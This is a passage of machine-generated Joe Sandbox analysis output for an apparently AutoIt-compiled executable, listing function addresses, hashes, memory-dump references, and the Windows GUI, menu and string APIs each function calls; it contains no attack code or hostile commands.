Source File: 00000000.00000002.1324703265.000000000171D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_171d000_bwYw3UUfy7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52b6af648c877ac6d6a76aa728722bf9b1b7a20dc0d1902be66db2f93aef2a5a
Instruction ID: b9658e4d06d436a391cc9d4f74b12db25c506d26ed89142862da4156b628d14d
Opcode Fuzzy Hash: 52b6af648c877ac6d6a76aa728722bf9b1b7a20dc0d1902be66db2f93aef2a5a
Instruction Fuzzy Hash: 0B019278A01109EFCB48DF98C5909AEF7B5FB48310F208599E809A7701E730AE42DB90

Function 017204A0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1324703265.000000000171D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_171d000_bwYw3UUfy7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab1ed642c9e2cf619b0ca28225d8e547d23f1e0e217189ac3431c3358c2c8a8c
Instruction ID: e220af744d3d34c17cb74ee19ba7c18fa3e8fbd77ac638b1b3f7cb4b7d593920
Opcode Fuzzy Hash: ab1ed642c9e2cf619b0ca28225d8e547d23f1e0e217189ac3431c3358c2c8a8c
Instruction Fuzzy Hash: 2A019278A01109EFCB44DF98C5909AEF7B5FB48310F208599E819A7701D730AE52DB90

Function 0171EE1E Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1324703265.000000000171D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_171d000_bwYw3UUfy7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39883051ad0acd5fc3a9b65a285c220fc8651299cfdca9718842298b505bee9e
Instruction ID: 12cbbee2ad97ca28ebd479973cedbf0f86dc4bb29c9604106d163cb5d8cfbbc3
Opcode Fuzzy Hash: 39883051ad0acd5fc3a9b65a285c220fc8651299cfdca9718842298b505bee9e
Instruction Fuzzy Hash: F6C08C300453C89ADB028759E08C7407BEDAB0AA18F1400E4D8080BA02C3A96A048A45

Function 0171EE30 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1324703265.000000000171D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_171d000_bwYw3UUfy7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 007C70D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 007C712F
GetSysColorBrush.USER32(0000000F), ref: 007C7160
GetSysColor.USER32(0000000F), ref: 007C716C
SetBkColor.GDI32(?,000000FF), ref: 007C7186
SelectObject.GDI32(?,?), ref: 007C7195
InflateRect.USER32(?,000000FF,000000FF), ref: 007C71C0
GetSysColor.USER32(00000010), ref: 007C71C8
CreateSolidBrush.GDI32(00000000), ref: 007C71CF
FrameRect.USER32(?,?,00000000), ref: 007C71DE
DeleteObject.GDI32(00000000), ref: 007C71E5
InflateRect.USER32(?,000000FE,000000FE), ref: 007C7230
FillRect.USER32(?,?,?), ref: 007C7262
GetWindowLongW.USER32(?,000000F0), ref: 007C7284

Part of subcall function 007C73E8: GetSysColor.USER32(00000012), ref: 007C7421
Part of subcall function 007C73E8: SetTextColor.GDI32(?,?), ref: 007C7425
Part of subcall function 007C73E8: GetSysColorBrush.USER32(0000000F), ref: 007C743B
Part of subcall function 007C73E8: GetSysColor.USER32(0000000F), ref: 007C7446
Part of subcall function 007C73E8: GetSysColor.USER32(00000011), ref: 007C7463
Part of subcall function 007C73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 007C7471
Part of subcall function 007C73E8: SelectObject.GDI32(?,00000000), ref: 007C7482
Part of subcall function 007C73E8: SetBkColor.GDI32(?,00000000), ref: 007C748B
Part of subcall function 007C73E8: SelectObject.GDI32(?,?), ref: 007C7498
Part of subcall function 007C73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 007C74B7
Part of subcall function 007C73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007C74CE
Part of subcall function 007C73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 007C74DB

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 0c1932fd30be6f36fac3045f0a20aea7c6defe64ec50d39f46bedb418566a478
Instruction ID: 95bb14aee427f790eee61de3f5e445209ec6bf0277b9cdd4a241b30f8de1441c
Opcode Fuzzy Hash: 0c1932fd30be6f36fac3045f0a20aea7c6defe64ec50d39f46bedb418566a478
Instruction Fuzzy Hash: F8A1AE72008305EFDB069F60DC48E6B7BA9FB88320F144A1DF966961E1DB38E944CF55

Function 00748D85 Relevance: 40.7, APIs: 22, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00748E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 00786AC5
6FCB0200.COMCTL32(?,000000FF,?), ref: 00786AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00786F43

Part of subcall function 00748F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00748BE8,?,00000000,?,?,?,?,00748BBA,00000000,?), ref: 00748FC5

SendMessageW.USER32(?,00001053), ref: 00786F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00786F96

Strings

0, xrefs: 00786DCF

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: MessageSend$Window$B0200DestroyInvalidateMoveRect
String ID: 0
API String ID: 1124025147-4108050209
Opcode ID: 6e459acfd5559ec3a3807c986b8f948c1c5c8bcdcad60a098f702ec8b742ab17
Instruction ID: 7213cbacc98beb061ed1ee55d2a336ec9b8fcca3905b06245c6a6028a0949c70
Opcode Fuzzy Hash: 6e459acfd5559ec3a3807c986b8f948c1c5c8bcdcad60a098f702ec8b742ab17
Instruction Fuzzy Hash: 0112BF30640211EFDB65EF24D848BAABBE1FB44310F548469F589DB261CB39EC91DF52

Function 007C73E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 007C7421
SetTextColor.GDI32(?,?), ref: 007C7425
GetSysColorBrush.USER32(0000000F), ref: 007C743B
GetSysColor.USER32(0000000F), ref: 007C7446
CreateSolidBrush.GDI32(?), ref: 007C744B
GetSysColor.USER32(00000011), ref: 007C7463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 007C7471
SelectObject.GDI32(?,00000000), ref: 007C7482
SetBkColor.GDI32(?,00000000), ref: 007C748B
SelectObject.GDI32(?,?), ref: 007C7498
InflateRect.USER32(?,000000FF,000000FF), ref: 007C74B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007C74CE
GetWindowLongW.USER32(00000000,000000F0), ref: 007C74DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007C752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 007C7554
InflateRect.USER32(?,000000FD,000000FD), ref: 007C7572
DrawFocusRect.USER32(?,?), ref: 007C757D
GetSysColor.USER32(00000011), ref: 007C758E
SetTextColor.GDI32(?,00000000), ref: 007C7596
DrawTextW.USER32(?,007C70F5,000000FF,?,00000000), ref: 007C75A8
SelectObject.GDI32(?,?), ref: 007C75BF
DeleteObject.GDI32(?), ref: 007C75CA
SelectObject.GDI32(?,?), ref: 007C75D0
DeleteObject.GDI32(?), ref: 007C75D5
SetTextColor.GDI32(?,?), ref: 007C75DB
SetBkColor.GDI32(?,?), ref: 007C75E5

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: b421abc9358da96e42f79838c4c0c8cf0270eab054d2266a8732be3e0d02d22f
Instruction ID: 6b1724d299fb6affd33f478fc3159952af850e4b23d505f78c367829edfa3403
Opcode Fuzzy Hash: b421abc9358da96e42f79838c4c0c8cf0270eab054d2266a8732be3e0d02d22f
Instruction Fuzzy Hash: BD616D72900218AFDF059FA4DC49EEE7FB9EB08320F158119F915BB2A1D7789940CF94

Function 00748891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00748968
GetSystemMetrics.USER32(00000007), ref: 00748970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0074899B
GetSystemMetrics.USER32(00000008), ref: 007489A3
GetSystemMetrics.USER32(00000004), ref: 007489C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 007489E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 007489F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00748A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00748A3C
GetClientRect.USER32(00000000,000000FF), ref: 00748A5A
GetStockObject.GDI32(00000011), ref: 00748A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 00748A81

Part of subcall function 0074912D: GetCursorPos.USER32(?), ref: 00749141
Part of subcall function 0074912D: ScreenToClient.USER32(00000000,?), ref: 0074915E
Part of subcall function 0074912D: GetAsyncKeyState.USER32(00000001), ref: 00749183
Part of subcall function 0074912D: GetAsyncKeyState.USER32(00000002), ref: 0074919D

SetTimer.USER32(00000000,00000000,00000028,007490FC), ref: 00748AA8

Strings

AutoIt v3 GUI, xrefs: 00748A20

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: dab5cdf50d9e74702f53829ce12f49700555bbc8d842b9cf976b6a3dee74aa4b
Instruction ID: eecf66bd415e0a4bcdfb41005bc80b2bbb3234b6f449a99d08c63d23c38ccaf4
Opcode Fuzzy Hash: dab5cdf50d9e74702f53829ce12f49700555bbc8d842b9cf976b6a3dee74aa4b
Instruction Fuzzy Hash: 3FB17D71A40209EFDF54DFA8DC49BAE7BB5FB48314F108129FA15A7290DB78A840CB55

Function 00737778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#OnAutoItStartRegister, xrefs: 00737817
', xrefs: 00775169
#ce, xrefs: 007378ED
#include, xrefs: 00737847
#comments-end, xrefs: 007378D9
Bad directive syntax error, xrefs: 0077519A
#cs, xrefs: 00737873, 007378C5
#comments-start, xrefs: 0073785F, 007378B1
#pragma compile, xrefs: 007377D3
Unterminated group of comments, xrefs: 0077528C
#requireadmin, xrefs: 007377FF
#include-once, xrefs: 0073782F
#notrayicon, xrefs: 007377E7
", xrefs: 00775153
Cannot parse #include, xrefs: 00775279

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 3df363ce2f0c9fb30500280a809ce6acfa78bb61a5952d516bb6f8110122ab2f
Instruction ID: 51a79d7f7a774469fbfc8c37f12ea04c8a9a7064f7702aa4d64a097a3d712490
Opcode Fuzzy Hash: 3df363ce2f0c9fb30500280a809ce6acfa78bb61a5952d516bb6f8110122ab2f
Instruction Fuzzy Hash: 9A81C7F1604605FBEF25AF60DC46FAE77A5AF15340F044028F909AA193EBBCD915C7A1

Function 0073326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00801990), ref: 00772F8D
GetMenuItemCount.USER32(00801990), ref: 0077303D
GetCursorPos.USER32(?), ref: 00773081
SetForegroundWindow.USER32(00000000), ref: 0077308A
TrackPopupMenuEx.USER32(00801990,00000000,?,00000000,00000000,00000000), ref: 0077309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 007730A9

Strings

0, xrefs: 0073327D

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 44465390c559f37daba4ff1b2418d4c20aa7f7e1c3a3b85df92b937b17823fda
Instruction ID: ff6933936437c8ccc48004a6340246fbfe22822f0c4fc236a9b6bf02a5c5dbd0
Opcode Fuzzy Hash: 44465390c559f37daba4ff1b2418d4c20aa7f7e1c3a3b85df92b937b17823fda
Instruction Fuzzy Hash: E071E771644205BEFF318F64DC49FAABF65FF05364F208216F5286A1E2C7B9A910DB50

Function 007A14BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 007A1502
VariantCopy.OLEAUT32(?,?), ref: 007A150B
VariantClear.OLEAUT32(?), ref: 007A1517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 007A15FB
VarR8FromDec.OLEAUT32(?,?), ref: 007A1657
VariantInit.OLEAUT32(007B4AFE), ref: 007A1708
SysFreeString.OLEAUT32(?), ref: 007A178C
VariantClear.OLEAUT32(007B4AFE), ref: 007A17D8
VariantClear.OLEAUT32(007B4AFE), ref: 007A17E7
VariantInit.OLEAUT32(00000000), ref: 007A1823

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 007A1625
Default, xrefs: 007A16AF

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: dd0cb6cdbe04eef7c3d26d526d791871f25b5388263e1f13f258a56852c70a64
Instruction ID: 94a1b57af7520447761cda66723d8b2cc4a7d47ed38e57e0cf42055e80f5a679
Opcode Fuzzy Hash: dd0cb6cdbe04eef7c3d26d526d791871f25b5388263e1f13f258a56852c70a64
Instruction Fuzzy Hash: D0D12171E00505EBEB049FA4D899B7DB7B1BF86700F94825AF446AB181DB3CED20DB61

Function 0079BF30 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00801990,000000FF,00000000,00000030), ref: 0079BFAC
SetMenuItemInfoW.USER32(00801990,00000004,00000000,00000030), ref: 0079BFE1
Sleep.KERNEL32(000001F4), ref: 0079BFF3
GetMenuItemCount.USER32(?), ref: 0079C039
GetMenuItemID.USER32(?,00000000), ref: 0079C056
GetMenuItemID.USER32(?,-00000001), ref: 0079C082
GetMenuItemID.USER32(?,?), ref: 0079C0C9
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0079C10F
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0079C124
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0079C145

Strings

0, xrefs: 0079BF3D

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep
String ID: 0
API String ID: 1460738036-4108050209
Opcode ID: 25895eec120127b0ed18a5258187de865979cef9512a12cde29eee9a4479eae3
Instruction ID: 4145834c54887a910c6c43c3f0d80226b87b3d24f36cf62c924c425d96cb4bdf
Opcode Fuzzy Hash: 25895eec120127b0ed18a5258187de865979cef9512a12cde29eee9a4479eae3
Instruction Fuzzy Hash: A96191B090024AEFDF12CF68ED88EEE7BB9FB05344F104159E915A3291D739AD15CB60

Function 00749838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00749944: GetWindowLongW.USER32(?,000000EB), ref: 00749952

GetSysColor.USER32(0000000F), ref: 00749862

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: a54e603de8f039459bede15daae47463e1d700131ce514f40a99e3e94ab5ed44
Instruction ID: 90a626e9fec581bc56a6ffda73f6878de5d06c8e5edd39974d1f2d9d7ac5b3d3
Opcode Fuzzy Hash: a54e603de8f039459bede15daae47463e1d700131ce514f40a99e3e94ab5ed44
Instruction Fuzzy Hash: C24194311446449FDB219F3D9C88FBA3B69AB46331F284619FAA68B1E1D739DC42DB10

Function 00739F09 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 228COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,-00000032), ref: 0073A0E1

Strings

=, xrefs: 0073A140
a, xrefs: 0073A066
0, xrefs: 0073A0BC
Z, xrefs: 0073A060
$, xrefs: 0073A032
_, xrefs: 0073A0C2
9, xrefs: 0073A131
A, xrefs: 0073A0B4
z, xrefs: 0073A06C

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: BuffCharUpper
String ID: $$0$9$=$A$Z$_$a$z
API String ID: 3964851224-1136989504
Opcode ID: d80e3978578f068d71092707ebcde1360d0fe1cf7a2da7e6e28f10fd1b2eb4b0
Instruction ID: 63f2e87e9597a0309041722f08712be0eb09998e2f87d42ce83eea338ef93c13
Opcode Fuzzy Hash: d80e3978578f068d71092707ebcde1360d0fe1cf7a2da7e6e28f10fd1b2eb4b0
Instruction Fuzzy Hash: 7E81D771D0020AEBEF18DFA8C8869FEB374FF14350F548526E592A7192E77C9941CB92

Function 007996E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,?,?,?,?,00773B9D,?,0000138A), ref: 00799717
LoadStringW.USER32(00000000,?,?,00773B9D), ref: 00799720

Part of subcall function 00739CB3: _wcslen.LIBCMT ref: 00739CBD

